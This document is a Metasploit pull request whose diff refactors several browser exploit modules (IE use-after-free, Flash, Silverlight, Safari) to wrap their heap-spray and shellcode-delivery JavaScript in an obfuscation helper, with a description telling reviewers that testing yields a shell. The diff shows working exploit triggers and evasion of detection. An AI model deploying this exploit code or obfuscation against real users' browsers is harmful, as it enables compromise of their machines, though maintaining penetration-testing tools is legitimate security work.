### PR TITLE
Update these BES modules to use JSObfu

### DIFF
--- a/modules/exploits/osx/browser/safari_user_assisted_download_launch.rb
+++ b/modules/exploits/osx/browser/safari_user_assisted_download_launch.rb
@@ -93,14 +93,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def generate_html
-    %Q|
-    <html><body>
-    #{datastore['CONTENT']}
-    <iframe id='f' src='about:blank' style='position:fixed;left:-500px;top:-500px;width:1px;height:1px;'>
-    </iframe>
-    <iframe id='f2' src='about:blank' style='position:fixed;left:-500px;top:-500px;width:1px;height:1px;'>
-    </iframe>
-    <script>
+    js = js_obfuscate(%Q|
     (function() {
       var r = parseInt(Math.random() * 9999999);
       if (#{datastore['SIGNED_APP'].present?}) r = '';
@@ -122,6 +115,17 @@ class Metasploit3 < Msf::Exploit::Remote
         }, #{datastore['LOOP_DELAY']});
       }
     })();
+    |)
+
+    %Q|
+    <html><body>
+    #{datastore['CONTENT']}
+    <iframe id='f' src='about:blank' style='position:fixed;left:-500px;top:-500px;width:1px;height:1px;'>
+    </iframe>
+    <iframe id='f2' src='about:blank' style='position:fixed;left:-500px;top:-500px;width:1px;height:1px;'>
+    </iframe>
+    <script>
+    #{js}
     </script>
     </body></html>
     |

--- a/modules/exploits/windows/browser/adobe_flash_avm2.rb
+++ b/modules/exploits/windows/browser/adobe_flash_avm2.rb
@@ -79,6 +79,8 @@ class Metasploit3 < Msf::Exploit::Remote
       'Privileged'     => false,
       'DisclosureDate' => "Feb 5 2014",
       'DefaultTarget'  => 0))
+
+    deregister_options('JsObfuscate')
   end
 
   def exploit

--- a/modules/exploits/windows/browser/adobe_flash_filters_type_confusion.rb
+++ b/modules/exploits/windows/browser/adobe_flash_filters_type_confusion.rb
@@ -64,6 +64,8 @@ class Metasploit3 < Msf::Exploit::Remote
       'Privileged'     => false,
       'DisclosureDate' => "Dec 10 2013",
       'DefaultTarget'  => 0))
+
+    deregister_options('JsObfuscate')
   end
 
   def exploit

--- a/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb
+++ b/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb
@@ -62,6 +62,8 @@ class Metasploit3 < Msf::Exploit::Remote
       'Privileged'     => false,
       'DisclosureDate' => "Apr 28 2014",
       'DefaultTarget'  => 0))
+
+    deregister_options('JsObfuscate')
   end
 
   def exploit

--- a/modules/exploits/windows/browser/adobe_flash_regex_value.rb
+++ b/modules/exploits/windows/browser/adobe_flash_regex_value.rb
@@ -68,6 +68,8 @@ class Metasploit3 < Msf::Exploit::Remote
       'Privileged'     => false,
       'DisclosureDate' => "Feb 8 2013",
       'DefaultTarget'  => 0))
+
+    deregister_options('JsObfuscate')
   end
 
   def exploit

--- a/modules/exploits/windows/browser/adobe_toolbutton.rb
+++ b/modules/exploits/windows/browser/adobe_toolbutton.rb
@@ -61,6 +61,8 @@ class Metasploit3 < Msf::Exploit::Remote
       'DisclosureDate' => "Aug 08 2013",
       'DefaultTarget'  => 0))
 
+
+    deregister_options('JsObfuscate')
   end
 
   def on_request_exploit(cli, request, target_info)
@@ -351,4 +353,3 @@ AcroRd32_60000000!DllCanUnloadNow+0x1493ae:
 60197b9b ff9064030000    call    dword ptr [eax+364h] ds:0023:0c0c0c0c=????????
 
 =end
-

--- a/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb
+++ b/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb
@@ -131,14 +131,7 @@ class Metasploit3 < Msf::Exploit::Remote
     }
     |
 
-    js = heaplib(js, {:noobfu => true})
-
-    if datastore['OBFUSCATE']
-      js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
-    end
-
-    return js
+    js_obfuscate(heaplib(js, {:noobfu => true})).to_s
   end
 
   def exploit_template(cli, target_info)

--- a/modules/exploits/windows/browser/ie_setmousecapture_uaf.rb
+++ b/modules/exploits/windows/browser/ie_setmousecapture_uaf.rb
@@ -176,9 +176,7 @@ class Metasploit3 < Msf::Exploit::Remote
     js_p1 = Rex::Text.to_unescape(p1)
     js_p2 = Rex::Text.to_unescape(p2)
 
-    %Q|
-<html>
-<script>
+    js = js_obfuscate(%Q|
 #{js_property_spray}
 
 function loadOffice() {
@@ -233,6 +231,12 @@ window.onload = function() {
   loadOffice();
   hit();
 }
+    |)
+
+    %Q|
+<html>
+<script>
+#{js.to_s}
 </script>
 </html>
     |

--- a/modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb
+++ b/modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb
@@ -80,6 +80,8 @@ class Metasploit3 < Msf::Exploit::Remote
       'DisclosureDate' => "Mar 12 2013",
       'DefaultTarget'  => 0))
 
+    deregister_options('JsObfuscate')
+
   end
 
   def setup
@@ -151,4 +153,3 @@ EOF
   end
 
 end
-

--- a/modules/exploits/windows/browser/ms13_059_cflatmarkuppointer.rb
+++ b/modules/exploits/windows/browser/ms13_059_cflatmarkuppointer.rb
@@ -126,16 +126,11 @@ class Metasploit3 < Msf::Exploit::Remote
     js_fake_obj = ::Rex::Text.to_unescape(get_fake_obj)
     js_payload  = ::Rex::Text.to_unescape(get_payload)
 
-    template = %Q|
-    <html>
-    <meta http-equiv="X-UA-Compatible" content="IE=7"/>
-    <meta http-equiv="refresh" content="2"/>
-    <head>
-    <script language='javascript'>
-    <%=js_property_spray%>
+    js = js_obfuscate(%Q|
+    #{js_property_spray}
 
-    var fake_obj = unescape("<%=js_fake_obj%>");
-    var s = unescape("<%=js_payload%>");
+    var fake_obj = unescape("#{js_fake_obj}");
+    var s = unescape("#{js_payload}");
 
     sprayHeap({shellcode:s});
 
@@ -149,11 +144,20 @@ class Metasploit3 < Msf::Exploit::Remote
       document.execCommand('SelectAll');
       document.execCommand('InsertButton');
       sprayHeap({shellcode:fake_obj, heapBlockSize:0x10});
-      document.body.innerHTML = '<%=Rex::Text.rand_text_alpha(1)%>';
+      document.body.innerHTML = '#{Rex::Text.rand_text_alpha(1)}';
     }
+    |)
+
+    template = %Q|
+    <html>
+    <meta http-equiv="X-UA-Compatible" content="IE=7"/>
+    <meta http-equiv="refresh" content="2"/>
+    <head>
+    <script language='javascript'>
+    #{js.to_s}
     </script>
     </head>
-    <body onload="setupPage()" onmove="hitMe()" />
+    <body onload="#{js.sym('setupPage')}()" onmove="#{js.sym('hitMe')}()" />
     </html>
     |
 

--- a/modules/exploits/windows/browser/ms13_090_cardspacesigninhelper.rb
+++ b/modules/exploits/windows/browser/ms13_090_cardspacesigninhelper.rb
@@ -84,6 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'DisclosureDate' => "Nov 08 2013",
       'DefaultTarget'  => 0))
 
+    deregister_options('JsObfuscate')
   end
 
   def exploit_template(cli, target_info)

--- a/modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb
+++ b/modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb
@@ -64,6 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'DisclosureDate' => "Feb 13 2014",
       'DefaultTarget'  => 0))
 
+    deregister_options('JsObfuscate')
   end
 
   def stack_adjust

--- a/modules/exploits/windows/browser/ms14_012_textrange.rb
+++ b/modules/exploits/windows/browser/ms14_012_textrange.rb
@@ -88,14 +88,9 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def exploit_html
-    template = %Q|<!DOCTYPE html>
-<html>
-  <head>
-    <meta http-equiv='Cache-Control' content='no-cache'/>
-    <meta http-equiv="X-UA-Compatible" content="IE=edge" >
-    <script>
-      <%=js_property_spray%>
-      sprayHeap({shellcode:unescape("<%=get_payload%>")});
+    js = js_obfuscate(%Q|
+      #{js_property_spray}
+      sprayHeap({shellcode:unescape("#{get_payload}")});
 
       function hxds() {
         try {
@@ -108,7 +103,7 @@ class Metasploit3 < Msf::Exploit::Remote
         var fake = "";
         for (var i = 0; i < 12; i++) {
           if (i==0) {
-             fake += unescape("<%=Rex::Text.to_unescape([target['Pivot']].pack('V*'))%>");
+             fake += unescape("#{Rex::Text.to_unescape([target['Pivot']].pack('V*'))}");
           }
           else {
             fake += "\\u4141\\u4141";
@@ -139,9 +134,18 @@ class Metasploit3 < Msf::Exploit::Remote
         var fillObject = document.createElement('button');
         fillObject.className = fake;
       }
+    |)
+
+    template = %Q|<!DOCTYPE html>
+<html>
+  <head>
+    <meta http-equiv='Cache-Control' content='no-cache'/>
+    <meta http-equiv="X-UA-Compatible" content="IE=edge" >
+    <script>
+    #{js.to_s}
     </script>
   </head>
-  <body onload='strike();'></body>
+  <body onload='#{js.sym('strike')}();'></body>
 </html>
     |
 

--- a/modules/exploits/windows/browser/wellintech_kingscada_kxclientdownload.rb
+++ b/modules/exploits/windows/browser/wellintech_kingscada_kxclientdownload.rb
@@ -58,6 +58,8 @@ class Metasploit3 < Msf::Exploit::Remote
         ],
       'DefaultTarget'  => 0,
       'DisclosureDate' => 'Jan 14 2014'))
+
+    deregister_options('JsObfuscate')
   end
 
   def on_request_exploit(cli, request, target_info)


### PR DESCRIPTION
These modules use BrowserExploitServer, so they should be updated.  You will see two types of changes:
- Modules that get deregistered: they don't use JavaScript. ms14_012_cmarkup_uaf.rb is a little bit different, because if obfuscated, the Flash portion won't know what function to call.
- Modules that use obfuscation: because they can. You should try test these, as many as possible.

Note: The Firefox and Android ones are untouched because they are updated ready.

This replaces #3850 & #3879
## Verification steps

When JsObfuscate is set to 1 or higher, you should see either the JavaScript is obfuscated, or you get a shell. One way to check if JavaScript is obfuscated or not is by doing a print_\* method in #js_obfuscate manually. You may decide on your own how you want verify this.
- [x] osx/browser/safari_user_assisted_download_launch
- [x] windows/browser/aladdin_choosefilepath_bof
- [x] windows/browser/ie_setmousecapture_uaf
- [x] windows/browser/ms13_022_silverlight_script_object
- [x] windows/browser/ms13_059_cflatmarkuppointer
- [x] windows/browser/ms14_012_textrange
